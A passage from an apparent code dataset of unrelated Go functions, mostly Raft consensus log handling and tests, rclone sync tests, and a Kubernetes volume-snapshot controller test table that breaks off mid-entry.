follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/* Sending an append request*/\n\t//-->Expeced LoggStore msg and Appendentry request to all servers containg current and previous entry.\n\tentr := []MyLogg{sm.Logg.Logg[sm.LoggInd-1], {6, \"rename test\"}}\n\tentry := Logg{Logg: entr}\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = LoggStore{Index: 4, Data: entr}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 4, PreLoggTerm: 6, LeaderCom: 2, Logg: entry}}\n\tfollTC.expect()\n\n\t/* Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 4, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with higher Term.\n\t//-->Expected to step down to Follower and as follower send Alarm signal.\n\tfollTC.req = VoteReq{Term: 8, CandId: 2000, PreLoggInd: 3, PreLoggTerm: 2}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tterm := request.term\n\tcmd := request.entries\n\tindex := request.prevLogIndex + 1\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field\n\n\tif len(r.myLog) == index {\n\t\tr.myLog = append(r.myLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.myLog[index] = logVal //overwriting in case of log repair\n\t\t//fmt.Println(\"Overwiriting!!\")\n\t}\n\t//fmt.Println(r.myId(), \"Append to log\", string(cmd))\n\t//modify metadata after appending\n\t//r.myMetaData.lastLogIndex = r.myMetaData.lastLogIndex + 1\n\t//r.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\t//\tif len(r.myLog) == 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1\n\t//\t} else if len(r.myLog) > 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t//\t}\n\n\t//Changed on 4th april, above is wrong in case of overwriting of log\n\tr.myMetaData.lastLogIndex = index\n\tr.myMetaData.prevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.myMetaData.prevLogTerm = r.myLog[index-1].Term\n\t}\n\n\t//Update commit index\n\tleaderCI := float64(request.leaderCommitIndex)\n\tmyLI := float64(r.myMetaData.lastLogIndex)\n\tif request.leaderCommitIndex > r.myMetaData.commitIndex {\n\t\tif myLI == -1 { //REDUNDANT since Append to log will make sure it is never -1,also must not copy higher CI if self LI is -1\n\t\t\tr.myMetaData.commitIndex = int(leaderCI)\n\t\t} else {\n\t\t\tr.myMetaData.commitIndex = int(math.Min(leaderCI, myLI))\n\t\t}\n\t}\n\t//fmt.Println(r.myId(), \"My CI is:\", r.myMetaData.commitIndex)\n\tr.WriteLogToDisk()\n}", "func (rf *Raft) CheckLogs() {\n\trf.mu.Lock()\n\tstate := rf.state\n\trf.mu.Unlock()\n\tfor state == LEADER {\n\t\t//DPrintf(\"CHECKLOGS ON NODE %d: logs %s\", rf.me, rf.logs)\n\t\t//appendChan := make(chan AppendResult, len(rf.peers))\n\t\tfor peerId := range rf.peers {\n\t\t\tif peerId == rf.me {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trf.mu.Lock()\n\t\t\tlogLen := len(rf.logs)\n\t\t\tnextIndex := rf.nextIndex[peerId]\n\t\t\trf.mu.Unlock()\n\t\t\tif logLen > nextIndex {\n\t\t\t\tgo func(peerId int) {\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tprevLogIndex := rf.matchIndex[peerId]\n\t\t\t\t\tprevLogTerm := rf.logs[prevLogIndex].Term\n\t\t\t\t\targs := AppendEntriesArgs{rf.currentTerm, rf.me,\n\t\t\t\t\t\tprevLogIndex, prevLogTerm,\n\t\t\t\t\t\trf.logs[prevLogIndex+1:], rf.commitIndex}\n\t\t\t\t\t\t//DPrintf(\"[BEFOREAPPEND] ENTRIES %s PREV %d LOGS %s\", args.Entries, args.PrevLogIndex, rf.logs)\n\t\t\t\t\trepl := AppendResult{}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\tfor rf.state == LEADER {\n\t\t\t\t\t\trf.sendAppendEntries(peerId, &args, &repl)\n\t\t\t\t\t\t//DPrintf(\"[CHECKAPPENDENTRIES REPLY]me: %d Term %d send to %d args: %s repl %s\", rf.me, rf.currentTerm, peerId, args, repl)\n\t\t\t\t\t\tif repl.Success && rf.state == LEADER{\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.nextIndex[peerId] = args.PrevLogIndex + len(args.Entries) + 1\n\t\t\t\t\t\t\trf.matchIndex[peerId] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\tif repl.Term > rf.currentTerm {\n\t\t\t\t\t\t\trf.currentTerm = repl.Term\n\t\t\t\t\t\t\trf.state = FOLLOWER\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif args.PrevLogIndex > 0 {\n\t\t\t\t\t\t\targs.PrevLogIndex -= 1\n\t\t\t\t\t\t\targs.PrevLogTerm = rf.logs[args.PrevLogIndex].Term\n\t\t\t\t\t\t\targs.Entries = rf.logs[args.PrevLogIndex+1:]\n\t\t\t\t\t\t}\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t}\n\t\t\t\t}(peerId)\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(time.Duration(50) * time.Millisecond)\n\t\t// sleep for a while\n\t}\n}", "func (tester *FollowTester) follow(t *testing.T, d *Dandelion) {\n\ta := assert.New(t)\n\ta.NoError(tester.acc0.SendTrxAndProduceBlock(Follow(tester.acc0.Name, tester.acc1.Name, false)))\n}", "func testSyncAfterRemovingAFileAndAddingAFile(ctx context.Context, t *testing.T) {\n\tr := fstest.NewRun(t)\n\tfile1 := r.WriteFile(\"potato2\", \"------------------------------------------------------------\", t1)\n\tfile2 := r.WriteObject(ctx, \"potato\", \"SMALLER BUT SAME DATE\", t2)\n\tfile3 := r.WriteBoth(ctx, \"empty space\", \"-\", t2)\n\tr.CheckRemoteItems(t, file2, file3)\n\tr.CheckLocalItems(t, file1, file3)\n\n\taccounting.GlobalStats().ResetCounters()\n\terr := Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\tr.CheckLocalItems(t, file1, file3)\n\tr.CheckRemoteItems(t, file1, file3)\n}", "func TestSyncWithUpdateOlder(t *testing.T) {\n\tctx := context.Background()\n\tctx, ci := fs.AddConfig(ctx)\n\tr := fstest.NewRun(t)\n\tif fs.GetModifyWindow(ctx, r.Fremote) == fs.ModTimeNotSupported {\n\t\tt.Skip(\"Can't run this test on fs which doesn't support mod time\")\n\t}\n\tt2plus := t2.Add(time.Second / 2)\n\tt2minus := t2.Add(time.Second / 2)\n\toneF := r.WriteFile(\"one\", \"one\", t1)\n\ttwoF := r.WriteFile(\"two\", \"two\", t3)\n\tthreeF := r.WriteFile(\"three\", \"three\", t2)\n\tfourF := r.WriteFile(\"four\", \"four\", t2)\n\tfiveF := r.WriteFile(\"five\", \"five\", t2)\n\tr.CheckLocalItems(t, oneF, twoF, threeF, fourF, fiveF)\n\toneO := r.WriteObject(ctx, \"one\", \"ONE\", t2)\n\ttwoO := r.WriteObject(ctx, \"two\", \"TWO\", t2)\n\tthreeO := r.WriteObject(ctx, \"three\", \"THREE\", t2plus)\n\tfourO := r.WriteObject(ctx, \"four\", \"FOURFOUR\", t2minus)\n\tr.CheckRemoteItems(t, oneO, twoO, threeO, fourO)\n\n\tci.UpdateOlder = true\n\tci.ModifyWindow = fs.ModTimeNotSupported\n\n\terr := Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\tr.CheckRemoteItems(t, oneO, twoF, threeO, fourF, fiveF)\n\n\tif r.Fremote.Hashes().Count() == 0 {\n\t\tt.Logf(\"Skip test with --checksum as no hashes supported\")\n\t\treturn\n\t}\n\n\t// now enable checksum\n\tci.CheckSum = true\n\n\terr = Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\tr.CheckRemoteItems(t, oneO, twoF, threeF, fourF, fiveF)\n}", "func TestProposal(t *testing.T) {\n\ttests := []struct {\n\t\t*network\n\t\tsuccess bool\n\t}{\n\t\t{newNetwork(nil, nil, nil), true},\n\t\t{newNetwork(nil, nil, nopStepper), true},\n\t\t{newNetwork(nil, nopStepper, nopStepper), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil, nil), true},\n\t}\n\n\tfor j, tt := range tests {\n\t\tsend := func(m pb.Message) {\n\t\t\tdefer func() {\n\t\t\t\t// only recover is we expect it to panic so\n\t\t\t\t// panics we don't expect go up.\n\t\t\t\tif !tt.success {\n\t\t\t\t\te := recover()\n\t\t\t\t\tif e != nil {\n\t\t\t\t\t\tt.Logf(\"#%d: err: %s\", j, e)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\t\t\ttt.send(m)\n\t\t}\n\n\t\tdefer tt.closeAll()\n\t\tdata := []byte(\"somedata\")\n\n\t\t// promote 0 the leader\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: data}}})\n\n\t\twantLog := newLog(NewMemoryStorage(), raftLogger)\n\t\tif tt.success {\n\t\t\twantLog = &raftLog{\n\t\t\t\tstorage: newInitedMemoryStorage(\n\t\t\t\t\t[]pb.Entry{{}, {Data: nil, Term: 1, Index: 1}, {Term: 1, Index: 2, Data: data}},\n\t\t\t\t),\n\t\t\t\tunstable: unstable{offset: 3},\n\t\t\t\tcommitted: 2}\n\t\t}\n\t\tdefer wantLog.storage.(IExtRaftStorage).Close()\n\t\tbase := ltoa(wantLog)\n\t\tfor i, p := range tt.peers {\n\t\t\tif sm, ok := p.(*raft); ok {\n\t\t\t\tl := ltoa(sm.raftLog)\n\t\t\t\tif g := diffu(base, l); g != \"\" {\n\t\t\t\t\tt.Errorf(\"#%d: diff:\\n%s\", i, g)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tt.Logf(\"#%d: empty log\", i)\n\t\t\t}\n\t\t}\n\t\tsm := tt.network.peers[1].(*raft)\n\t\tif g := sm.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", j, g, 1)\n\t\t}\n\t}\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tId := response.FollowerId\n\tfailedIndex := r.f_specific[Id].nextIndex\n\tvar nextIndex int\n\tif failedIndex != 0 {\n\t\tif response.LastLogIndex < r.MyMetaData.LastLogIndex { //==CHECK\n\t\t\tnextIndex = response.LastLogIndex + 1\n\t\t} else {\n\t\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\t\t\t//nextIndex = response.LastLogIndex + 1 //changed on 12 march--failing for some cases --CHECK, doesn't work with for loop in handleClient\n\t\t}\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\tr.f_specific[Id].nextIndex = nextIndex\n\treturn\n}", "func TestSync(t *testing.T) {\n\tsize := int64(1)\n\ttests := []controllerTest{\n\t\t{\n\t\t\t// snapshot is bound to a non-existing content\n\t\t\tname: \"2-1 - snapshot is bound to a non-existing content\",\n\t\t\tinitialContents: nocontents,\n\t\t\texpectedContents: nocontents,\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-1\", \"snapuid2-1\", \"claim2-1\", \"\", validSecretClass, \"content2-1\", &True, nil, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-1\", \"snapuid2-1\", \"claim2-1\", \"\", validSecretClass, \"content2-1\", &False, nil, nil, newVolumeError(\"VolumeSnapshotContent is missing\"), false, true),\n\t\t\texpectedEvents: []string{\"Warning SnapshotContentMissing\"},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t/*{\n\t\t\tname: \"2-2 - snapshot points to a content but content does not point to snapshot(VolumeSnapshotRef does not match)\",\n\t\t\tinitialContents: newContentArray(\"content2-2\", \"snapuid2-2-x\", \"snap2-2\", \"sid2-2\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content2-2\", \"snapuid2-2-x\", \"snap2-2\", \"sid2-2\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-2\", \"snapuid2-2\", \"claim2-2\", \"\", validSecretClass, \"content2-2\", &False, nil, nil, nil),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-2\", \"snapuid2-2\", \"claim2-2\", \"\", validSecretClass, \"content2-2\", &False, nil, nil, newVolumeError(\"Snapshot is bound to a VolumeSnapshotContent which is bound to other Snapshot\")),\n\t\t\texpectedEvents: []string{\"Warning InvalidSnapshotBinding\"},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshotError,\n\t\t},*/\n\t\t{\n\t\t\tname: \"2-3 - success bind snapshot and content but not ready, no status changed\",\n\t\t\tinitialContents: newContentArray(\"content2-3\", \"snapuid2-3\", \"snap2-3\", \"sid2-3\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-3\", \"snapuid2-3\", \"snap2-3\", \"sid2-3\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &True, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-3\", \"snapuid2-3\", \"claim2-3\", \"\", validSecretClass, \"content2-3\", &False, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-3\", \"snapuid2-3\", \"claim2-3\", \"\", validSecretClass, \"content2-3\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\tinitialClaims: newClaimArray(\"claim2-3\", \"pvc-uid2-3\", \"1Gi\", \"volume2-3\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-3\", \"pv-uid2-3\", \"pv-handle2-3\", \"1Gi\", \"pvc-uid2-3\", \"claim2-3\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\t/*expectedCreateCalls: []createCall{\n\t\t\t\t{\n\t\t\t\t\tsnapshotName: \"snapshot-snapuid2-3\",\n\t\t\t\t\tvolume: newVolume(\"volume2-3\", \"pv-uid2-3\", \"pv-handle2-3\", \"1Gi\", \"pvc-uid2-3\", \"claim2-3\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\t\t\tparameters: class5Parameters,\n\t\t\t\t\tsecrets: map[string]string{\"foo\": \"bar\"},\n\t\t\t\t\t// information to return\n\t\t\t\t\tdriverName: mockDriverName,\n\t\t\t\t\tsize: defaultSize,\n\t\t\t\t\tsnapshotId: \"sid2-3\",\n\t\t\t\t\tcreationTime: timeNow,\n\t\t\t\t\treadyToUse: False,\n\t\t\t\t},\n\t\t\t},*/\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\t// nothing changed\n\t\t\tname: \"2-4 - noop\",\n\t\t\tinitialContents: newContentArray(\"content2-4\", \"snapuid2-4\", \"snap2-4\", \"sid2-4\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content2-4\", \"snapuid2-4\", \"snap2-4\", \"sid2-4\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-4\", \"snapuid2-4\", \"claim2-4\", \"\", validSecretClass, \"content2-4\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-4\", \"snapuid2-4\", \"claim2-4\", \"\", validSecretClass, \"content2-4\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"2-5 - snapshot and content bound, status ready false -> true\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &False, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &False, metaTimeNow, nil, nil, false, true),\n\t\t\tinitialClaims: newClaimArray(\"claim2-5\", \"pvc-uid2-5\", \"1Gi\", \"volume2-5\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-5\", \"pv-uid2-5\", \"pv-handle2-5\", \"1Gi\", \"pvc-uid2-5\", \"claim2-5\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\t/*expectedCreateCalls: []createCall{\n\t\t\t\t{\n\t\t\t\t\tsnapshotName: \"snapshot-snapuid2-5\",\n\t\t\t\t\tvolume: newVolume(\"volume2-5\", \"pv-uid2-5\", \"pv-handle2-5\", \"1Gi\", \"pvc-uid2-5\", \"claim2-5\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\t\t\tparameters: class5Parameters,\n\t\t\t\t\tsecrets: map[string]string{\"foo\": \"bar\"},\n\t\t\t\t\t// information to return\n\t\t\t\t\tdriverName: mockDriverName,\n\t\t\t\t\tsize: defaultSize,\n\t\t\t\t\tsnapshotId: \"sid2-5\",\n\t\t\t\t\tcreationTime: timeNow,\n\t\t\t\t\treadyToUse: True,\n\t\t\t\t},\n\t\t\t},*/\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"2-6 - snapshot bound to prebound content correctly, status ready false -> true, ref.UID '' -> 'snapuid2-6'\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-6\", \"snapuid2-6\", \"snap2-6\", \"sid2-6\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-6\", \"snapuid2-6\", \"snap2-6\", \"sid2-6\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-6\", \"snapuid2-6\", \"\", \"content2-6\", validSecretClass, \"content2-6\", &False, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-6\", \"snapuid2-6\", \"\", \"content2-6\", validSecretClass, \"content2-6\", &False, metaTimeNow, nil, nil, false, true),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t/*{\n\t\t\tname: \"2-7 - snapshot and content bound, csi driver get status error\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-7\", \"snapuid2-7\", \"snap2-7\", \"sid2-7\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-7\", \"snapuid2-7\", \"snap2-7\", \"sid2-7\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-7\", \"snapuid2-7\", \"claim2-7\", \"\", validSecretClass, \"content2-7\", &False, metaTimeNow, nil, nil),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-7\", \"snapuid2-7\", \"claim2-7\", \"\", validSecretClass, \"content2-7\", &False, metaTimeNow, nil, newVolumeError(\"Failed to check and update snapshot: mock create snapshot error\")),\n\t\t\texpectedEvents: []string{\"Warning SnapshotCheckandUpdateFailed\"},\n\t\t\tinitialClaims: newClaimArray(\"claim2-7\", \"pvc-uid2-7\", \"1Gi\", \"volume2-7\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-7\", \"pv-uid2-7\", \"pv-handle2-7\", \"1Gi\", \"pvc-uid2-7\", \"claim2-7\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\texpectedCreateCalls: []createCall{\n\t\t\t\t{\n\t\t\t\t\tsnapshotName: \"snapshot-snapuid2-7\",\n\t\t\t\t\tvolume: newVolume(\"volume2-7\", \"pv-uid2-7\", \"pv-handle2-7\", \"1Gi\", \"pvc-uid2-7\", \"claim2-7\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\t\t\tparameters: class5Parameters,\n\t\t\t\t\tsecrets: map[string]string{\"foo\": \"bar\"},\n\t\t\t\t\t// information to return\n\t\t\t\t\terr: errors.New(\"mock create snapshot error\"),\n\t\t\t\t},\n\t\t\t},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},*/\n\t\t/*{\n\t\tname: \"2-8 - snapshot and content bound, apiserver update status error\",\n\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-8\", \"snapuid2-8\", \"snap2-8\", \"sid2-8\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-8\", \"snapuid2-8\", \"snap2-8\", \"sid2-8\", validSecretClass, \"\", \"\", deletionPolicy, &timeNowStamp, nil, &False, false),\n\t\tinitialSnapshots: newSnapshotArray(\"snap2-8\", \"snapuid2-8\", \"claim2-8\", \"\", validSecretClass, \"content2-8\", &False, metaTimeNow, nil, nil),\n\t\texpectedSnapshots: newSnapshotArray(\"snap2-8\", \"snapuid2-8\", \"claim2-8\", \"\", validSecretClass, \"content2-8\", &False, metaTimeNow, nil, newVolumeError(\"Failed to check and update snapshot: snapshot controller failed to update default/snap2-8 on API server: mock update error\")),\n\t\texpectedEvents: []string{\"Warning SnapshotCheckandUpdateFailed\"},\n\t\tinitialClaims: newClaimArray(\"claim2-8\", \"pvc-uid2-8\", \"1Gi\", \"volume2-8\", v1.ClaimBound, &classEmpty),\n\t\tinitialVolumes: newVolumeArray(\"volume2-8\", \"pv-uid2-8\", \"pv-handle2-8\", \"1Gi\", \"pvc-uid2-8\", \"claim2-8\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t/*expectedCreateCalls: []createCall{\n\t\t\t{\n\t\t\t\tsnapshotName: \"snapshot-snapuid2-8\",\n\t\t\t\tvolume: newVolume(\"volume2-8\", \"pv-uid2-8\", \"pv-handle2-8\", \"1Gi\", \"pvc-uid2-8\", \"claim2-8\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\t\tparameters: class5Parameters,\n\t\t\t\tsecrets: map[string]string{\"foo\": \"bar\"},\n\t\t\t\t// information to return\n\t\t\t\tdriverName: mockDriverName,\n\t\t\t\tsize: defaultSize,\n\t\t\t\tsnapshotId: \"sid2-8\",\n\t\t\t\tcreationTime: timeNow,\n\t\t\t\treadyToUse: true,\n\t\t\t},\n\t\t},*/ /*\n\t\t\terrors: []reactorError{\n\t\t\t\t// Inject error to the first client.VolumesnapshotV1beta1().VolumeSnapshots().Update call.\n\t\t\t\t// All other calls will succeed.\n\t\t\t\t{\"update\", \"volumesnapshots\", errors.New(\"mock update error\")},\n\t\t\t},\n\t\t\ttest: testSyncSnapshot,\n\t\t},*/\n\t\t{\n\t\t\tname: \"2-9 - fail on status update as there is not pvc provided\",\n\t\t\tinitialContents: newContentArray(\"content2-9\", \"snapuid2-9\", \"snap2-9\", \"sid2-9\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content2-9\", \"snapuid2-9\", \"snap2-9\", \"sid2-9\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-9\", \"snapuid2-9\", \"claim2-9\", \"\", validSecretClass, \"\", &False, nil, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-9\", \"snapuid2-9\", \"claim2-9\", \"\", validSecretClass, \"content2-9\", &True, nil, nil, nil, false, true),\n\t\t\t//expectedSnapshots: newSnapshotArray(\"snap2-9\", \"snapuid2-9\", \"claim2-9\", \"\", validSecretClass, \"content2-9\", &False, nil, nil, newVolumeError(\"Failed to check and update snapshot: failed to get input parameters to create snapshot snap2-9: \\\"failed to retrieve PVC claim2-9 from the lister: \\\\\\\"persistentvolumeclaim \\\\\\\\\\\\\\\"claim2-9\\\\\\\\\\\\\\\" not found\\\\\\\"\\\"\")),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"2-10 - do not bind when snapshot and content not match\",\n\t\t\tinitialContents: newContentArray(\"content2-10\", \"snapuid2-10-x\", \"snap2-10\", \"sid2-10\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content2-10\", \"snapuid2-10-x\", \"snap2-10\", \"sid2-10\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-10\", \"snapuid2-10\", \"claim2-10\", \"\", validSecretClass, \"\", &False, nil, nil, newVolumeError(\"mock driver error\"), false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-10\", \"snapuid2-10\", \"claim2-10\", \"\", validSecretClass, \"\", &False, nil, nil, newVolumeError(\"mock driver error\"), false, true),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"3-1 - ready snapshot lost reference to VolumeSnapshotContent\",\n\t\t\tinitialContents: nocontents,\n\t\t\texpectedContents: nocontents,\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap3-1\", \"snapuid3-1\", \"claim3-1\", \"\", validSecretClass, \"content3-1\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap3-1\", \"snapuid3-1\", \"claim3-1\", \"\", validSecretClass, \"content3-1\", &False, metaTimeNow, nil, newVolumeError(\"VolumeSnapshotContent is missing\"), false, true),\n\t\t\terrors: noerrors,\n\t\t\texpectedEvents: []string{\"Warning SnapshotContentMissing\"},\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"3-2 - ready snapshot bound to none-exist content\",\n\t\t\tinitialContents: nocontents,\n\t\t\texpectedContents: nocontents,\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap3-2\", \"snapuid3-2\", \"claim3-2\", \"\", validSecretClass, \"content3-2\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap3-2\", \"snapuid3-2\", \"claim3-2\", \"\", validSecretClass, \"content3-2\", &False, metaTimeNow, nil, newVolumeError(\"VolumeSnapshotContent is missing\"), false, true),\n\t\t\terrors: noerrors,\n\t\t\texpectedEvents: []string{\"Warning SnapshotContentMissing\"},\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"3-3 - ready snapshot(everything is well, do nothing)\",\n\t\t\tinitialContents: newContentArray(\"content3-3\", \"snapuid3-3\", \"snap3-3\", \"sid3-3\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content3-3\", \"snapuid3-3\", \"snap3-3\", \"sid3-3\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap3-3\", \"snapuid3-3\", \"claim3-3\", \"\", validSecretClass, \"content3-3\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap3-3\", \"snapuid3-3\", \"claim3-3\", \"\", 